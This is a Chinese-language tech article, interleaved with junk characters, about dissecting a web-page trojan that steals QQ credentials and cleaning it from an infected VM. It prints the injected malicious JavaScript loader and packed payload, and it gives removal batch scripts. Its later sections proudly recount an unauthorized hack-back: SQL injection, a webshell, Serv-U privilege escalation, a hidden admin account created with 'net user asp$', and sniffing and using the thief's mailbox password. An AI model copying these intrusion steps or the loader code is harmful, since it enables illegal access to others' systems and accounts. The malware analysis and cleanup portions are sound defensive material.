作者: 甘肃/老五, 出处:IT专家网,$ D+ A% L: N+ O L, P* r
如今互联网上木马病毒十分猖獗,您一不小心就可能深陷病毒的泥潭,如何及时发现并对这种恼人的网络威胁宣战?如何避免用户的信息安全呢?本文将详细介绍…… & ]) R" f( l5 T2 W" Y4 d$ X6 O
^/ p9 Y/ ^% j) d3 s6 F4 ]6 {
【IT专家网独家】说互联网上到处是“马窝”、“毒窟”,你信吗?不信?我们就来个现场直播!上演一场以毒攻毒,直捣“毒窝”的攻坚战,出发...... ( i8 Y8 h0 @4 K
一、陷入毒窝
3 ]5 }& b, j* G2 Q0 v 我们在Google中搜索资料的时候,经常会看到这样的搜索结果“该网站可能含有恶意软件,有可能会危害您的电脑。”或者“继续访问 http://www.*.com,但风险自担。”这是Google以自己的方式对网页安全性分析的结果。我们没有理由怀疑Google的技术,这是它在以自己的方式告诉我们“这是个毒窝”。以“不入虎穴,焉得虎子”的英勇,我们就去探探虎穴。
3 I2 y O7 k) d! C$ \3 W9 c 测试环境说明:一安装有Windows XP的虚拟机,没有打补丁包,没有安装杀毒软件和防火墙。 % I6 s; B3 x% M0 A) Q! ]& C
1.探毒
* c) g4 e$ b+ v5 O 第一步:下载网页
8 k& [7 _5 T6 n$ h& j (为了不至于“出师未捷,而光荣牺牲。”我先把挂马的网页下载下来。看看到底用了什么网马,怎么挂的?)用迅雷很快地把挂了马的网页下载下来。 0 e6 ~5 W5 [7 J, o: Y6 E
第二步:分析网页代码 # [. N' w# O# E9 B. K. Q7 i& U8 E7 X
用记事本打开网页查看源代码,通过分析,发现挂马者在该网站的首页的开头和尾部都加入了如下的代码:
2 l$ z: T0 J8 J" r5 i
( |* x9 l: O% c4 @* k3 N% Y
( |- _+ M. V( z9 B
& v6 {% z. K' r+ K: q) u4 X/ | V: q" h0 V
1 q9 K. c( }) \6 ?
<SCRIPT language=javascript> window.open ("http://www.*.com/1.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script> |
m |. ]! G8 Z 这是一个用javascript脚本木马的代码,其中的http://www.*.com/1.htm应该是网页木马的地址。
H9 ]; W+ v0 T- j- Q% i" M! O 第三步:继续用迅雷下载http://www.*.com/1.htm,用记事本打开,代码如下: 2 {2 @* Z. U, s+ g- K& r' a' e
3 n. C2 D! z" G W
" Y" i+ m9 s1 [1 q2 F- @5 z1 \
* V6 m$ V8 g' ~! _3 A/ {0 p0 A+ p5 U1 W: @) d
<script language=javascript src="http://my.*.com/admin.js>";</script> | " r s0 a _8 Z
这是一个木马脚本,通过脚本调用了一个js文件。
% d0 k6 }1 _! @( |' T) c2 T 第四步:用迅雷下载admin.js文件,用记事本打开,部分代码如下: & Y8 u' o5 Q9 D: Y
+ u0 _. i) C4 Z ]# K4 n7 n
# z* Q, k# S, d
% s: b! m& v' V+ Y3 ~+ D% j
: g7 L q" R8 F% Meval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('Z("\\l\\t\\6\\9\\2\\g\\f\\6\\1\\K\\6\\d\\6\\b\\1\\Q\\1\\u\\5\\7\\1\\6\\t\\c\\q\\0\\7\\1\\j\\1\\L\\5\\2(中间省去n多......)\\f\\e\\0\\6\\3\\i\\p\\b\\8\\1\\O\\1\\9\\5\\2\\9\\x\\d\\g\\b\\1\\Q\\1\\g\\j\\o\\8\\1\\O")',62,68,'145|40|164|42|56|141|156|162|73|143|144|51|155|50|160|157|151|154|54|75|123|146|163|47|61|60|142|170|53|165|166|106|103|150|117|152|101|57|171|167|55|105|124|102|66|63|147|115|71|65|175|120|173|62|121|72|134|104|107|176|52|eval|114|110|127|70|64|130'.split('|'),0,{})) |
u; [ @! D+ I% f! K) v; k 很明显这个网马加密并且编译了,通过Google查询这应该是冰狐的网马。 4 g% R) o' u, D
2.试毒:用虚拟机器的浏览器中打开被挂马的网页地址,有一个小窗口突然闪了一下消失了,网页迟迟不能打开,桌面任务栏上的网络连接图表突然长亮,硬盘狂响,应该是在往硬盘上下载什么。不管什么了,我不入地狱,谁入地狱?大概20秒钟好像木马好像已经下载完毕并运行了。
2 }1 r2 q. \" ]% t2 x, Q4 N 二、刮骨疗伤 : H! X0 q( v0 T5 M
木马入驻系统后对几个关键的地方进行查看。 $ ~& w& p2 k+ P! [8 g) ^
刮骨:
2 l/ c }0 d' U1 g8 J 1.任务管理器: # B; ]$ p0 d/ U: [
运行任务管理器,通过和以前的进程对比发现多了lexplore.exe、SVCH0ST.EXE(0是数字)两个未知进程。试着结束lexplore.exe进程,可以,但不到五秒钟又出现了。结束SVCH0ST.EXE进程,同样不到一秒也出现了。为什么会这样呢?通过分析发现:原来这两个进程是木马释放的两个文件创建的,构成了双保险,互相监视。当一方的进程被结束,另一方在下一个周期内对进程表进行扫描发现对方不在,就重新创建一个。另外如果有一个文件被删除,Wlgx.dll会重新释放一个(这是后来才发现的)。
% a1 ~( t8 l4 G 2.在搜索最新的文件:
7 S' ~0 A E! g) B, I 通过“资源管理器”→“工具”→“文件夹选项”→“查看”中设置“显示所有的文件”,运用文件搜索工具搜索今天创建的所有文件。通过对搜索结果的分析发现了几个可疑的文件,它们分别是: ; g x4 T+ b8 s+ b3 z: H
临时目录:%temp%\Wl2\lexplore.exe)
! [6 \& h Q; _4 ~5 `' w# x. o/ B 释放库文件:%temp%\Wlgx.dll - K `" v5 h! A) S# O* b6 X! Z% k
系统目录:%systemroot%\system32\SVCH0ST.EXE %systemroot%\system32\lexplore.exe
9 g1 @1 A" {, _8 c% e- J. ] 在每个根目录下出现了三个文件:auatorun.inf、lexplore.exe、SVCH0ST.EXE(目的是在打开各个根目录的时候病毒会自动运行。)
5 K8 y6 \3 {" I, c3 a! D# `8 e 注:以上文件都是隐藏、只读、系统文件。 # U" b( z; A: X" L
3.注册表中新添加的项目 8 g& W8 U, ?( ~
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
! _' U9 A1 l3 N "myWl2"="%temp%\Wl2\lexplore.exe"
/ {& {0 _+ G9 ~$ | [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
5 ?5 {+ p2 t. D: F4 q8 { "Shell"="EXPLORER.EXE,SVCH0ST.EXE" % b7 V3 p# |7 X
4.服务管理器
# X7 a. w( Q5 L, j, l' ? 运行服务管理器通过对比发现多了两个可疑的项目: . L4 S3 @# B0 i" i0 m
服务名称:SVCH0ST $ a) A2 H! m/ Z
显示名称:SVCHOST - j: r: \' W4 N& Z" z/ l+ z6 C
描述:系统网络服务组件
& i8 p* K" w! A# ]+ K* E 可执行文件的路径:c:\windows\system32\SVCH0ST.EXE 9 ]5 H9 v d; C& S( S& f- P
启动类型:自动
- j# T6 \* Y8 Y, U% \8 U8 K2 ^ 服务状态:启动
9 J8 d+ [2 \: N+ u9 { _ 服务名称:lexplore.exe
7 G' ^% j* B t0 n$ ^ 显示名称:lexplore.exe $ m& N1 ^# U4 [
描述:网络浏览辅助
( f0 N5 W9 e# j5 s/ {& n1 y, s 可执行文件的路径:c:\windows\system32\lexplore.exe 3 N4 A! b4 ^! t4 B7 i% c
启动类型:自动
: U. A- R% T" [, f6 Q4 ^ 服务状态:启动 ' V3 d# \1 l) G5 t* R' B1 U1 w
疗伤: : c, `' N, _. ^
1.结束进程:由于这两个进程直接互相保护,只能采取非常规的办法,用批处理,代码如下: - u/ g% j) _) ~3 L9 T" t: i1 t
. m& k% J9 h% e ~; S, F# E( L$ j4 K
% t* S w) w. A Y4 E( _
: H4 r. J& b6 t1 x# s+ O% o# t6 s8 T+ ]+ d- r
@echo off taskkill /f /im SVCH0ST.EXE copy c:\windows\notepad.exe c:\windows\system32\SVCH0ST.EXE taskkill /f /im lexplore.exe del c:\windows\system32\SVCH0ST.EXE del c:\windows\system32\lexplore.exe exit | + _6 s) O! G3 v; L% l% C+ b
说明:(1).由于两个进程之间互相保护,大概每隔五秒钟就扫描一次进程,如果用手工的方法太慢,没有等把源文件删除,木马的进程已经被创建出来,就无法删除源文件。(2).代码第三行在SVCHOST.EXE进程被结束掉后,用notepad.exe(记事本)程序替换木马程序,那么当lexplore.exe进程发现SVCH0ST.EXE进程被结束重新创建的该进程,其实就是打开了记事本程序。那么现在结束lexplore.exe进程,就不会有真正的SVCH0ST.EXE保护了。 + X- j4 m6 L9 W/ Y# D4 p) k" W
2.删除病毒文件:两个系统目录下的病毒文件被删除,其它地方的病毒我们同样用批处理,代码如下: 0 F" S) r. G* q) w% A
$ N* ]. N# D) d: u% _: t: I
8 j8 W* G* [; ^% u- N$ j0 C0 ~' @- i9 T6 L
* K. I ~/ m# Z2 \5 ?
0 _4 v8 o/ J. }* J- w/ @- c+ O; o @echo off del %temp%\Wl2\lexplore.exe del %temp%\Wlgx.dll cd attrib -a -s -h autorun.inf attrib -a -s -h lexplore.exe attrib -a -s -h SVCH0ST.EXE del autorun.inf del lexplore.exe del SVCH0ST.EXE d: attrib -a -s -h autorun.inf attrib -a -s -h lexplore.exe attrib -a -s -h SVCH0ST.EXE del autorun.inf del lexplore.exe del SVCH0ST.EXE | 5 d4 a$ B/ p: o" q2 K
注:我的虚拟机只有两个分区,为了下面的木马分析,我保存了lexplore.exe、SVCH0ST.EXE、Wlgx.dll木马文件。
1 A0 j1 w4 }9 d+ F+ D7 P% s 三、深入毒窝
8 h7 e' y; n0 T) q. @4 K4 f7 a 文章写到这里,突然有个想法,进入毒窟看看!试试能否进入那台挂马者放置木马文件主机。
+ V1 ~% h0 h+ U! r8 h1 q w- l 这是一台web服务器,先旁注看看目标还有什么站,结果发现是一个商业站点,只有一个站,主机是独立的。不管那么多,开着X-Scan扫描一下再说,接着去问问“Google”,看看到底是个什么站。关键字输入:http://www.*.com(安全原因,用了*)结果什么也没有出来,点击下面的“寻找网页包含有www.*.com”,出现了不该看到的结果。这些网站都被插入了木马,真可怜,稍微整理了一下搜索结果,除去有些站长求助的帖子外,足有30多个不同的站点被插入了恶意代码!而且都是国内的站点。先不管了,看看我的扫描结果,目标开了21.80.3389端口。21的FTP连接不上,80是网址服务器,3389是默认的终端服务器,先3389连接看看,过了N久才连接上,速度特慢。尝试了几个弱密码均告失败。去http://www.ip138.com看了一下,填上Ping出来的ip地址,才发现是深圳网通的主机,和笔者所在地区相隔太远,怪不得这么慢。
) F; k7 K; x9 n7 H4 o 换个思路,试试为web注入,千辛万苦找到一个注入点,获取管理员账户和密码,扫描得到网站后台,登录进入后台,通过“备份数据库”得到一个webshell。试试cmd,可以执行,但权限太低。对方开来ftp应该安装有ftp软件。果然在“c:\Program Files”中看到了Serv-U,著名的Serv-U漏洞大家都知道吧!试试提权,不成功!上传一个ftp提取工具,再试成功。可以马上创建一个管理员用户: ( q+ d( o0 Z5 H9 h# ^5 `( X1 P2 m
* g5 M8 R7 F6 i" }8 q- W3 H+ a
" h( \$ o# [& u: a6 F
# ?( c' j! m& s1 T" @7 z# g8 Q4 A: }
0 A* T$ ^$ n# r) |: Y$ n6 R; E: ^net user asp$ "test" /add net localgroup administrators asp$ /add |
0 G6 B+ X8 B% Q 389远程登录,大概看了一下帮管理员清除了网马,留言提示管理员修补漏洞,撤人。
; @. I- P m1 P1 M2 `8 a 四、还治其人
% k8 e: b9 @) m) ^8 V$ g7 n 通过分析SVCH0ST.EXE是木马的主程序,运用查壳工具发现加了壳,马上脱壳。用十六进制编辑器WinHex打开脱壳后的木马,估计是个QQ尾巴木马,这样的木马是用来盗取QQ的,一般把盗取的QQ号和密码发到指定的邮箱,或者ftp服务器的一个文件中。以http、www搜索,没有结果,看来它不是用ftp文件形式存放QQ号和密码的。再以@*.com搜索,终于看到了一个邮箱地址*@gmail.com(安全原因,用了*),查找密码,没有发现,一定是加密了。一般这样的木马在配置的时候必须要填入邮箱密码,不然不能发送邮件。我们先打开嗅探工具,我用的是WSockExpert,设置对于SVCH0ST.EXE的网络数据进行嗅探。接着运行QQ输入用户名和密码登录,登录成功,这期间看见WSockExpert再不断地抓包,大概再QQ登录后一分钟停止嗅探。通过对数据包的分析很快找到了邮箱密码,因为是明文,所有很好找。马上登录邮箱,成功了!好家伙,竟然盗了这么多,我的QQ号和密码赫然其中!怎么办?改了他的邮箱密码吗?算了,删了与QQ相关的邮件,另外用邮箱自发一个警告邮件! - w" h+ i8 p }) W7 ?8 y% h6 b
结束语:这次“攻毒”行动,虽有波折,但还算顺利。用两句话来结束这篇文章:我不入地狱,谁人地狱?我入地狱,为了你们不入地狱! |